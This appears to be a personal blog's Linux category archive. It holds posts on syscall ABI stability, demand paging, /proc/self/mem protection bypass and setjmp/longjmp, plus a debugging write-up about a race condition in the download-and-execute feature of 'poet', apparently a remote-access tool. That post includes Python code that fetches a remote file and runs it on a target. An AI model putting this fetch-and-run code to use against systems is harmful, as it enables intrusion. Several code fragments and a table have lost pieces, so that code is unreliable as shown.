Category Archives: Linux

Syscall ABI compatibility: Linux vs Windows/macOS

The Linux kernel has an interesting difference compared to the Windows and macOS kernels: it offers syscall ABI compatibility.

This means that applications that program directly against the raw syscall interface are more or less guaranteed to always keep working, even with arbitrarily newer kernel versions. “Programming against the raw syscall interface” means including assembly code in your app that triggers syscalls:

  • setting the appropriate syscall number in the syscall register
  • setting arguments in the defined argument registers
  • executing a syscall instruction
  • reading the syscall return value register

Here are the ABIs for some common architectures.

Syscall Number RegisterSyscall ArgumentsSyscall Return Value
x86_64RAXRDI, RSI, RDX, R10, R8, R9RAX
Manticore is my go-to source to quickly look these up:

Once you’ve done this, now you’re relying on the kernel to not change any part of this. If the kernel changes any of these registers, or changes the syscall number mapping, your app will not longer trigger the desired syscall correctly and will break.

Aside from writing raw assembly in your app, there’s a more innocuous way of accidentally “programming directly against the syscall interface”: statically linking to libc. When you statically link to a library, that library’s code is directly included in your binary. libc is generally the system component responsible for implementing the assembly to trigger syscalls, and by statically linking to it, you effectively inline those assembly instructions directly into your application.

So why does Linux offer this and Windows and macOS don’t?

In general, compatibility is cumbersome. As a developer, if you can avoid having to maintain compatibility, it’s better. You have more freedom to change, improve, and refactor in the future. So by default it’s preferable to not maintain compatibility — including for kernel development.

Windows and macOS are able to not offer compatibility because they control the libc for their platforms and the rules for using it. And one of their rules is “you are not allowed to statically link libc”. For the exact reason that this would encourage apps that depend directly on the syscall ABI, hindering the kernel developers’ ability to freely change the kernel’s implementation.

If all app developers are forced to dynamically link against libc, then as long as kernel developers also update libc with the corresponding changes to the syscall ABI, everything works. Old apps run on a new kernel will dynamically link against the new libc, which properly implements the new ABI. Compatibility is of course still maintained at the app/libc level — just not at the libc/kernel level.

Linux doesn’t control the libc in the same way Windows and macOS do because in the Linux world, there is a distinct separation between kernel and userspace that isn’t present in commercial operating systems. Strictly speaking Linux is just the kernel, and you’re free to run whatever userspace on top. Most people run GNU userspace components (glibc), but alternatives are not unheard of (musl libc, also bionic libc on Android).

So because Linux kernel developers can’t 100% control the libc that resides on the other end of the syscall interface, they bite the bullet and retain ABI compatibility. This technically allows you to statically link with more confidence than on other OSs. That said, there are other reasons why you shouldn’t statically link libc, even on Linux.


This directory documents the interfaces that the developer has
defined to be stable.  Userspace programs are free to use these
interfaces with no restrictions, and backward compatibility for
them will be guaranteed for at least 2 years.  Most interfaces
(like syscalls) are expected to never change and always be

kernel docs

What:		The kernel syscall interface
	This interface matches much of the POSIX interface and is based
	on it and other Unix based interfaces.  It will only be added to
	over time, and not have things removed from it.

	Note that this interface is different for every architecture
	that Linux supports.  Please see the architecture-specific
	documentation for details on the syscall numbers that are to be
	mapped to each syscall.

apple developer docs

Q:  I'm trying to link my binary statically, but it's failing to link because it can't find crt0.o. Why?
A: Before discussing this issue, it's important to be clear about terminology:

A static library is a library of code that can be linked into a binary that will, eventually, be dynamically linked to the system libraries and frameworks.
A statically linked binary is one that does not import system libraries and frameworks dynamically, but instead makes direct system calls into the kernel.
Apple fully supports static libraries; if you want to create one, just start with the appropriate Xcode project or target template.

Apple does not support statically linked binaries on Mac OS X. A statically linked binary assumes binary compatibility at the kernel system call interface, and we do not make any guarantees on that front. Rather, we strive to ensure binary compatibility in each dynamically linked system library and framework.

If your project absolutely must create a statically linked binary, you can get the Csu (C startup) module from Darwin and try building crt0.o for yourself. Obviously, we won't support such an endeavor.


  • Solaris also stopped supporting static linking against libc.

What they don’t tell you about demand paging in school

This post details my adventures with the Linux virtual memory subsystem, and my discovery of a creative way to taunt the OOM (out of memory) killer by accumulating memory in the kernel, rather than in userspace.

Keep reading and you’ll learn:

  • Internal details of the Linux kernel’s demand paging implementation
  • How to exploit virtual memory to implement highly efficient sparse data structures
  • What page tables are and how to calculate the memory overhead incurred by them
  • A cute way to get killed by the OOM killer while appearing to consume very little memory (great for parties)

Note: Victor Michel wrote a great follow up to this post here.

Continue reading

You can use /proc/*/mem to bypass memory protections

Filmed some screencasts today explaining some interesting behavior with /proc/self/mem — you can use it to write to unwritable memory (including the text of libc!).

Read bits are not enforced for memory mappings

Filmed a screencast exploring some neat mmap behavior — read bits are not enforced for memory mappings. This is because the underlying x86 page table entries have a single bit to toggle between “Read” and “Read/Write”.

Being pedantic about C++ compilation


  • Don’t assume it’s safe to use pre-built dependencies when compiling C++ programs. You might want to build from source, especially if you can’t determine how a pre-built object was compiled, or if you want to use a different C++ standard than was used to compile it.
  • Ubuntu has public build logs which can help you determine if you can use a pre-built object, or if you should compile from source.
  • pkg-config is useful for generating the flags needed to compile a complex third-party dependency. CMake’s PkgConfig module can make it easy to integrate a dep into your build system.
  • Use CMake IMPORTED targets (e.g. BZip2::Bzip2) versus legacy variables (e.g. BZIP2_INCLUDE_DIRS and BZIP2_LIBRARIES).
Continue reading

struct stat notes

struct stat on Linux is pretty interesting

  • the struct definition in the man page is not exactly accurate
  • glibc explicitly pads the struct with unused members which is intersting. I guess to reserve space for expansion of fields
    • if you want to see the real definition, a trick you can use is writing a test program that uses a struct stat, and compiling with -E to stop after preprocessing then look in that output for the definition
  • you can look in the glibc sources and the linux sources and see that they actually have to make their struct definitions match! (i think). since kernel space is populating the struct memory and usespace is using it, they need to exactly agree on where what members are
    • you can find some snarky comments in linux about the padding, which is pretty funny. for example (arch/arm/include/uapi/asm/stat.h)
  • because the structs are explicitly padded, if you do a struct designator initialization, you CANNOT omit the designators. if you do, the padded members will be initialized instead of the fields you wanted!

How setjmp and longjmp work

Pretty recently I learned about setjmp() and longjmp(). They’re a neat pair of libc functions which allow you to save your program’s current execution context and resume it at an arbitrary point in the future (with some caveats1). If you’re wondering why this is particularly useful, to quote the manpage, one of their main use cases is “…for dealing with errors and interrupts encountered in a low-level subroutine of a program.” These functions can be used for more sophisticated error handling than simple error code return values.

I was curious how these functions worked, so I decided to take a look at musl libc’s implementation for x86. First, I’ll explain their interfaces and show an example usage program. Next, since this post isn’t aimed at the assembly wizard, I’ll cover some basics of x86 and Linux calling convention to provide some required background knowledge. Lastly, I’ll walk through the source, line by line.

Continue reading

Off to the (Python Internals) Races

This post is about an interesting race condition bug I ran into when working on a small feature improvement for poet a while ago that I thought was worth writing a blog post about.

In particular, I was improving the download-and-execute capability of poet which, if you couldn’t tell, downloads a file from the internet and executes it on the target. At the original time of writing, I didn’t know about the python tempfile module and since I recently learned about it, I wanted to integrate it into poet as it would be a significant improvement to the original implementation. The initial patch looked like this.

r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)

This code downloads a file from the internet, writes it to a tempfile on disk, sets the permissions to executable, executes it in a subprocess. In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed though that when I used or used .wait() on the Popen(), it would work fine, however I intentionally didn’t want the client to block while the file executed its arbitrary payload, so I couldn’t use those functions.

The fact that the execution would work when the Popen call waited for the process and didn’t work otherwise suggests that there was something going on between the time it took to execute the child and the time it took for the with block to end and delete the file, which is tempfile‘s default behavior. More specifically, the file must have been deleted at some point before the exec syscall loaded the file from disk into memory. Let’s take a look at the implementation of subprocess.Popen() to see if we can gain some more insight:

def _execute_child(self, args, executable, preexec_fn, close_fds,
                           cwd, env, universal_newlines,
                           startupinfo, creationflags, shell, to_close,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite):
            """Execute program (POSIX version)"""


               = os.fork()
                        if gc_was_enabled:
                    self._child_created = True
                    if == 0:
                        # Child
                            # Close parent's pipe ends
                            if p2cwrite is not None:
                            if c2pread is not None:
                            if errread is not None:

                            # When duping fds, if there arises a situation
                            # where one of the fds is either 0, 1 or 2, it
                            # is possible that it is overwritten (#12607).
                            if c2pwrite == 0:
                                c2pwrite = os.dup(c2pwrite)
                            if errwrite == 0 or errwrite == 1:
                                errwrite = os.dup(errwrite)

                            # Dup fds for child
                            def _dup2(a, b):
                                # dup2() removes the CLOEXEC flag but
                                # we must do it ourselves if dup2()
                                # would be a no-op (issue #10806).
                                if a == b:
                                    self._set_cloexec_flag(a, False)
                                elif a is not None:
                                    os.dup2(a, b)
                            _dup2(p2cread, 0)
                            _dup2(c2pwrite, 1)
                            _dup2(errwrite, 2)

                            # Close pipe fds.  Make sure we don't close the
                            # same fd more than once, or standard fds.
                            closed = { None }
                            for fd in [p2cread, c2pwrite, errwrite]:
                                if fd not in closed and fd > 2:

                            if cwd is not None:

                            if preexec_fn:

                            # Close all other fds, if asked for - after
                            # preexec_fn(), which may open FDs.
                            if close_fds:

                            if env is None:
                                os.execvp(executable, args)
                                os.execvpe(executable, args, env)

                            exc_type, exc_value, tb = sys.exc_info()
                            # Save the traceback and attach it to the exception object
                            exc_lines = traceback.format_exception(exc_type,
                            exc_value.child_traceback = ''.join(exc_lines)
                            os.write(errpipe_write, pickle.dumps(exc_value))

                        # This exitcode won't be reported to applications, so it
                        # really doesn't matter what we return.

                    # Parent
                    if gc_was_enabled:
                    # be sure the FD is closed no matter what

                # Wait for exec to fail or succeed; possibly raising exception
                # Exception limited to 1M
                data = _eintr_retry_call(, errpipe_read, 1048576)


The _execute_child() function is called by the subprocess.Popen class constructor and implements child process execution. There’s a lot of code here, but key parts to notice here are the os.fork() call which creates the child process, and the relative lengths of the following if blocks. The check if == 0 contains the code for executing the child process and is significantly more involved than the code for handling the parent process.

From this, we can deduce that when the subprocess.Popen() call executes in my code, after forking, while the child is preparing to call os.execve, the parent simply returns, and immediately exits the with block. This automatically invokes the f.close() function which deletes the temp file. By the time the child calls os.execve, the file has been deleted on disk. Oops.

I fixed this by adding the delete=False argument to the NamedTemporaryFile constructor to suppress the auto-delete functionality. Of course this means that the downloaded files will have to be cleaned up manually, but this allows the client to not block when executing the file and have the code still be pretty clean.

Main takeaway here: don’t try to Popen a NamedTemporaryFile as the last statement in the tempfile’s with block.